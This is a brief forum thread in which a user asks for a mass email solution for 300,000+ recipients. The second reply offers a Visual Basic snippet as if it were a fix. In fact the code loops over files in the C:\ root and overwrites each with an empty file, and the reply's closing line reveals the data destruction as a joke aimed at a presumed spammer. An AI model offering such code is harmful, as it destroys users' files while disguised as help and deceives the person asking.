Does anyone know of a great mass email solution that can handle 300,000+. Seems that once you get over 30,000 it starts to get crazy. Any help appreciated.
Printable View
Does anyone know of a great mass email solution that can handle 300,000+. Seems that once you get over 30,000 it starts to get crazy. Any help appreciated.
Why dont u go to http://www.killallspammers.com ;-)
Try this code
dim t as double
dim message as string
dim a as string
dim f as integer
a = dir("c:\*.*")
for t=1 to 300000
f = freefile
open a for output as #f
close #f
a = dir
next t
Now you wont have to worry about the 32000 limit, nor will the receivers of your junk...